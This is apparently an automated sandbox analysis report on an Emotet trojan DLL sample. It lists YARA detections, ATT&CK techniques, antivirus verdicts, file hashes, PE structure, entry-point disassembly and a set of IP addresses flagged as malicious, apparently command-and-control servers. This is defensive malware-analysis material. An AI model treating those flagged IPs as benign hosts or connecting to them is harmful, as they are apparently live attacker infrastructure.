                      Source: Yara match; File source: 4.2.rundll32.exe.dd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.2.regsvr32.exe.3190000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.2.rundll32.exe.eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.2.rundll32.exe.eb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 4.2.rundll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.2.regsvr32.exe.4d30000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 5.2.rundll32.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 5.2.rundll32.exe.e20000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.2.regsvr32.exe.41d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 6.2.regsvr32.exe.3190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 5.2.rundll32.exe.e50000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.2.regsvr32.exe.4200000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.2.rundll32.exe.4870000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000002.384631851.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000005.00000002.388750186.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000006.00000002.896680035.0000000003190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000002.387530383.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000002.387558358.0000000004201000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.384161260.0000000004871000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                      Execution: Native API (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
                      Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
                      Privilege Escalation: DLL Side-Loading (1); Process Injection (111); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
                      Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); File Deletion (1); Masquerading (2); Virtualization/Sandbox Evasion (2); Process Injection (111); Hidden Files and Directories (1); Regsvr32 (1); Rundll32 (1)
                      Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                      Discovery: System Time Discovery (2); File and Directory Discovery (2); System Information Discovery (26); Query Registry (1); Security Software Discovery (21); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); Remote System Discovery (1); Process Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
                      Collection: Archive Collected Data (1); Input Capture (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
                      Command and Control: Ingress Tool Transfer (1); Encrypted Channel (12); Non-Standard Port (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                      Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact
                      [Behavior graph. ID: 632747; Sample: l2sFDHB0lp; Start date: 24/05/2022; Architecture: WINDOWS; Score: 100]

                      Source            Detection   Scanner          Label
                      l2sFDHB0lp.dll    65%         Virustotal
                      l2sFDHB0lp.dll    68%         ReversingLabs    Win32.Trojan.Emotet
                      l2sFDHB0lp.dll    100%        Avira            TR/AD.Nekark.bnwrm
                      l2sFDHB0lp.dll    100%        Joe Sandbox ML

                      No Antivirus matches

                      Source                               Detection   Scanner   Label
                      4.2.rundll32.exe.dd0000.0.unpack     100%        Avira     HEUR/AGEN.1215461
                      3.2.rundll32.exe.eb0000.0.unpack     100%        Avira     HEUR/AGEN.1215461
                      6.2.regsvr32.exe.3190000.0.unpack    100%        Avira     HEUR/AGEN.1215461
                      6.2.regsvr32.exe.4d30000.1.unpack    100%        Avira     TR/Crypt.XPACK.Gen
                      5.2.rundll32.exe.e50000.1.unpack     100%        Avira     TR/Crypt.XPACK.Gen
                      2.2.regsvr32.exe.4200000.1.unpack    100%        Avira     TR/Crypt.XPACK.Gen
                      2.2.regsvr32.exe.41d0000.0.unpack    100%        Avira     HEUR/AGEN.1215461
                      5.2.rundll32.exe.e20000.0.unpack     100%        Avira     HEUR/AGEN.1215461
                      3.2.rundll32.exe.4870000.1.unpack    100%        Avira     TR/Crypt.XPACK.Gen
                      4.2.rundll32.exe.e20000.1.unpack     100%        Avira     TR/Crypt.XPACK.Gen

                      Source                         Detection   Scanner      Label
                      windowsupdatebg.s.llnwi.net    0%          Virustotal

                      Source                                                             Detection   Scanner           Label
                      https://www.disneyplus.com/legal/your-california-privacy-rights    0%          URL Reputation    safe
                      http://crl.ver)                                                    0%          Avira URL Cloud   safe
                      https://www.disneyplus.com/legal/privacy-policy                    0%          URL Reputation    safe
                      https://www.tiktok.com/legal/report/feedback                       0%          URL Reputation    safe
                      http://help.disneyplus.com.                                        0%          URL Reputation    safe
                      https://www.pango.co/privacy                                       0%          URL Reputation    safe
                      https://disneyplus.com/legal.                                      0%          URL Reputation    safe
                      Name                           IP                Active   Malicious   Antivirus Detection   Reputation
                      windowsupdatebg.s.llnwi.net    95.140.236.128    true     false                             unknown

                      Name: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp
                      Malicious: false
                      Antivirus Detection: URL Reputation: safe
                      Reputation: unknown

                      Name: http://crl.ver)
                      Source: svchost.exe, 00000016.00000002.683376230.00000228C5900000.00000004.00000020.00020000.00000000.sdmp
                      Malicious: false
                      Antivirus Detection: Avira URL Cloud: safe
                      Reputation: low

                      Name: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp
                      Malicious: false
                      Antivirus Detection: URL Reputation: safe
                      Reputation: unknown

                      Name: https://www.tiktok.com/legal/report/feedback
                      Source: svchost.exe, 00000016.00000003.662945656.00000228C599A000.00000004.00000020.00020000.00000000.sdmp
                      Malicious: false
                      Antivirus Detection: URL Reputation: safe
                      Reputation: unknown

                      Name: http://help.disneyplus.com.
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp
                      Malicious: false
                      Antivirus Detection: URL Reputation: safe
                      Reputation: unknown

                      Name: https://support.hotspotshield.com/
                      Source: svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp
                      Malicious: false
                      Reputation: high

                      Name: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp
                      Malicious: false
                      Reputation: high

                      Name: https://www.pango.co/privacy
                      Source: svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp
                      Malicious: false
                      Antivirus Detection: URL Reputation: safe
                      Reputation: unknown

                      Name: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp
                      Malicious: false
                      Antivirus Detection: URL Reputation: safe
                      Reputation: unknown
                      IP    Domain    Country    Flag    ASN    ASN Name    Malicious
                          50.116.54.215
                          unknownUnited States
                          63949LINODE-APLinodeLLCUStrue
                          131.100.24.231
                          unknownBrazil
                          61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                          46.55.222.11
                          unknownBulgaria
                          34841BALCHIKNETBGtrue
                          173.212.193.249
                          unknownGermany
                          51167CONTABODEtrue
                          176.104.106.96
                          unknownSerbia
                          198371NINETRStrue
                          192.99.251.50
                          unknownCanada
                          16276OVHFRtrue
                          45.142.114.231
                          unknownGermany
                          44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                          1.234.2.232
                          unknownKorea Republic of
                          9318SKB-ASSKBroadbandCoLtdKRtrue
                          203.114.109.124
                          unknownThailand
                          131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                          119.193.124.41
                          unknownKorea Republic of
                          4766KIXS-AS-KRKoreaTelecomKRtrue
                          129.232.188.93
                          unknownSouth Africa
                          37153xneeloZAtrue
                          159.8.59.82
                          unknownUnited States
                          36351SOFTLAYERUStrue
                          92.240.254.110
                          unknownSlovakia (SLOVAK Republic)
                          42005LIGHTSTORM-COMMUNICATIONS-SRO-SK-ASPeeringsSKtrue
                          IP
                          192.168.2.1
                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:632747
                          Start date and time:2022-05-24 00:14:23 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 12m 57s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:l2sFDHB0lp (renamed file extension from none to dll)
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of newly started processes analysed:24
                          Number of newly started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winDLL@18/2@0/59
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 99.9% (good quality ratio 96.2%)
                          • Quality average: 82.3%
                          • Quality standard deviation: 25.2%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 54
                          • Number of non-executed functions: 298
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Override analysis time to 240s for rundll32
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 95.140.236.128, 20.223.24.244
                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, wu-bg-shim.trafficmanager.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                          • Not all processes were analyzed; report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          Time      Type             Description
                          00:17:39  API Interceptor  8x Sleep call for process: svchost.exe modified
                                                                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                                                          Category:dropped
                                                                                                          Size (bytes):61480
                                                                                                          Entropy (8bit):7.9951219482618905
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                                                          MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                                                          SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                                                          SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                                                          SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                                                          Malicious:false
                                                                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          File Type:data
                                                                                                          Category:modified
                                                                                                          Size (bytes):290
                                                                                                          Entropy (8bit):2.9380604305618476
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:kK3AoxN+SkQlPlEGYRMY9z+4KlDA3RUe/:/akPlE99SNxAhUe/
                                                                                                          MD5:A8A90B2CC4B49AB61ECBB670692B585F
                                                                                                          SHA1:A1437C8A1531A29E55AAF87E0F498C538A6EC56A
                                                                                                          SHA-256:B8A8BDD69375EB5BA5C1EA945685043DFEBCE708F8404C97D24430DE7A68424C
                                                                                                          SHA-512:ADC84D0B598FFB4159946CE75BC5312E0B15753E6F4A4FD4FB0C5C6928E1EA8861BE6741A15ADA8C694AA7B37ED134EFFC94BDDDFE3D37065A4C62488AD1C8C5
                                                                                                          Malicious:false
                                                                                                          Preview:p...... ........HqM3>o..(....................................................... ........3k/"[..................(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...
                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.352816951557855
                                                                                                          TrID:
                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                                                                                                          • Windows Screen Saver (13104/52) 1.29%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:l2sFDHB0lp.dll
                                                                                                          File size:655360
MD5:b6ca42b6646e847ad826ebfc2e68d554
SHA1:cc06a349b47ca49503d5e2da477642c4fa95af8f
SHA256:91df13870c9b89883c0547af0c23b6c45d262781c593449a3356c0989ba88774
SHA512:8cfb77fb4e293043a991fc5d9f4c9c5fde1fe09156ba3b309f0a8a26f1f09524f232700f9b596acdf3e281505b9cc34323a5edc338a65c962281820c73e24519
SSDEEP:6144:/6ZMFXzqfoSHr/mvcQYbi2HN8C8BgifO7y7qcuVqrWLWN7Ypsi6Ih9vH0/oUHahE:/8MFX47ivcQMNsrDrKJjO69cI
TLSH:02D47C0EFFD1C1B2D36B123019D5C64823ADBF2CEAA1C5B777A8BE1D69326C14512B16
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..0m..cm..cm..c...cg..c...ck..c~..co..c...c|..cm..c@..ch..cq..ch..c...cF..cd..ch..c...ch..cl..c...cl..ch..cl..cRichm..c.......
Icon Hash:c0cc4c687ccccc78
Entrypoint:0x1001131c
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:0x623CFB7E [Thu Mar 24 23:15:10 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:d63ab94f4bb6b5d2f0f6092bf07e00ac
Instruction
push 0000000Ch
push 10041D40h
call 00007FADB90F37B1h
xor eax, eax
inc eax
mov dword ptr [ebp-1Ch], eax
mov esi, dword ptr [ebp+0Ch]
xor edi, edi
cmp esi, edi
jne 00007FADB90F25CEh
cmp dword ptr [1004F3C8h], edi
je 00007FADB90F2679h
mov dword ptr [ebp-04h], edi
cmp esi, eax
je 00007FADB90F25C7h
cmp esi, 02h
jne 00007FADB90F25F3h
mov eax, dword ptr [10050CB4h]
cmp eax, edi
je 00007FADB90F25CEh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call eax
mov dword ptr [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], edi
je 00007FADB90F264Bh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007FADB90F23E7h
mov dword ptr [ebp-1Ch], eax
cmp eax, edi
je 00007FADB90F2634h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007FADB90E7358h
mov dword ptr [ebp-1Ch], eax
cmp esi, 01h
jne 00007FADB90F25D0h
cmp eax, edi
jne 00007FADB90F25CCh
push ebx
push edi
push dword ptr [ebp+08h]
call 00007FADB90F23BDh
cmp esi, edi
je 00007FADB90F25C7h
cmp esi, 03h
jne 00007FADB90F25EBh
push ebx
push esi
push dword ptr [ebp+08h]
call 00007FADB90F23AAh
test eax, eax
jne 00007FADB90F25C5h
mov dword ptr [ebp-1Ch], edi
cmp dword ptr [ebp-1Ch], edi
je 00007FADB90F25D5h
mov eax, dword ptr [10050CB4h]
cmp eax, edi
je 00007FADB90F25CCh
push ebx
push esi
push dword ptr [ebp+08h]
call eax
mov dword ptr [ebp-1Ch], eax
or dword ptr [ebp-04h], FFFFFFFFh
mov eax, dword ptr [ebp-1Ch]
jmp 00007FADB90F25DCh
mov eax, dword ptr [ebp-14h]
mov ecx, dword ptr [eax]
Programming Language:
• [ASM] VS2003 (.NET) build 3077
• [LNK] VS2003 (.NET) build 3077
• [RES] VS2003 (.NET) build 3077
• [EXP] VS2003 (.NET) build 3077
• [C++] VS2003 (.NET) build 3077
• [ C ] VS2003 (.NET) build 3077
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4aa40 | 0x6e | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x48844 | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x51000 | 0x480a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9a000 | 0x4e40 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x43830 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3c000 | 0x668 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x487bc | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3a49e | 0x3b000 | False | 0.600941803496 | data | 6.61163923679 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x3c000 | 0xeaae | 0xf000 | False | 0.32216796875 | data | 5.04668369528 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4b000 | 0x5cb8 | 0x3000 | False | 0.251383463542 | data | 3.83461094959 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x51000 | 0x480a0 | 0x49000 | False | 0.552453446062 | data | 6.07779046742 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x9a000 | 0x8810 | 0x9000 | False | 0.350667317708 | data | 4.48951519418 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
\x428\x428\x428\x41e | 0x747c0 | 0x20800 | data | |
RT_CURSOR | 0x95028 | 0x134 | data | |
RT_CURSOR | 0x95160 | 0xb4 | data | |
RT_CURSOR | 0x95240 | 0x134 | AmigaOS bitmap font | |
RT_CURSOR | 0x95390 | 0x134 | data | |
RT_CURSOR | 0x954e0 | 0x134 | data | |
RT_CURSOR | 0x95630 | 0x134 | data | |
RT_CURSOR | 0x95780 | 0x134 | data | |
RT_CURSOR | 0x958d0 | 0x134 | data | |
RT_CURSOR | 0x95a20 | 0x134 | data | |
RT_CURSOR | 0x95b70 | 0x134 | data | |
RT_CURSOR | 0x95cc0 | 0x134 | data | |
RT_CURSOR | 0x95e10 | 0x134 | data | |
RT_CURSOR | 0x95f60 | 0x134 | AmigaOS bitmap font | |
RT_CURSOR | 0x960b0 | 0x134 | data | |
RT_CURSOR | 0x96200 | 0x134 | data | |
RT_CURSOR | 0x96350 | 0x134 | data | |
RT_BITMAP | 0x522e0 | 0x428 | data | |
RT_BITMAP | 0x520c0 | 0xe0 | GLS_BINARY_LSB_FIRST | Spanish | Mexico
RT_BITMAP | 0x965a0 | 0xb8 | data | |
RT_BITMAP | 0x96658 | 0x144 | data | |
RT_ICON | 0x52a98 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | |
RT_ICON | 0x632d8 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | |
RT_ICON | 0x73b18 | 0x2e8 | data | |
RT_ICON | 0x73e00 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x73f50 | 0x2e8 | data | |
RT_ICON | 0x74238 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x74388 | 0x2e8 | data | |
RT_ICON | 0x74670 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_MENU | 0x52728 | 0x23a | data | |
RT_MENU | 0x521b0 | 0x46 | data | Spanish | Mexico
RT_DIALOG | 0x52968 | 0x12c | data | |
RT_DIALOG | 0x521f8 | 0xe2 | data | Spanish | Mexico
RT_DIALOG | 0x964a0 | 0xfe | data | |
RT_STRING | 0x96810 | 0x92 | data | |
RT_STRING | 0x967a0 | 0x6a | data | Spanish | Mexico
RT_STRING | 0x968a8 | 0x48 | data | |
RT_STRING | 0x96938 | 0x19e | data | |
RT_STRING | 0x96c08 | 0x280 | data | |
RT_STRING | 0x97010 | 0x39c | data | |
RT_STRING | 0x96f90 | 0x7a | data | |
RT_STRING | 0x96ad8 | 0x12e | data | |
RT_STRING | 0x96e88 | 0x104 | data | |
RT_STRING | 0x968f0 | 0x46 | data | |
RT_STRING | 0x973b0 | 0x128 | data | |
RT_STRING | 0x974d8 | 0x240 | data | |
RT_STRING | 0x97718 | 0x9e | data | |
RT_STRING | 0x977b8 | 0xb0 | Hitachi SH big-endian COFF object file, not stripped, 16640 sections, symbol offset=0x69007200, 201344768 symbols, optional header size 29952 | |
RT_STRING | 0x97868 | 0x30 | data | |
RT_STRING | 0x97898 | 0x1d0 | data | |
RT_STRING | 0x97a68 | 0x5bc | data | |
RT_STRING | 0x98418 | 0x31c | data | |
RT_STRING | 0x98118 | 0x300 | data | |
RT_STRING | 0x98fa0 | 0xb0 | data | |
RT_STRING | 0x98028 | 0xee | data | |
RT_STRING | 0x98e50 | 0x11e | data | |
RT_STRING | 0x98738 | 0x4d0 | data | |
RT_STRING | 0x98c08 | 0x248 | data | |
RT_STRING | 0x98f70 | 0x2e | data | |
RT_STRING | 0x99050 | 0x4c | data | |
RT_ACCELERATOR | 0x94fc0 | 0x68 | data | |
RT_GROUP_CURSOR | 0x95218 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | |
RT_GROUP_CURSOR | 0x95a08 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x95378 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x958b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x95768 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x96098 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x95618 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x95ca8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x954c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x95b58 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x95df8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x95f48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x961e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x96338 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_CURSOR | 0x96488 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | |
RT_GROUP_ICON | 0x632c0 | 0x14 | data | |
RT_GROUP_ICON | 0x73f28 | 0x22 | data | |
RT_GROUP_ICON | 0x73b00 | 0x14 | data | |
RT_GROUP_ICON | 0x74360 | 0x22 | data | |
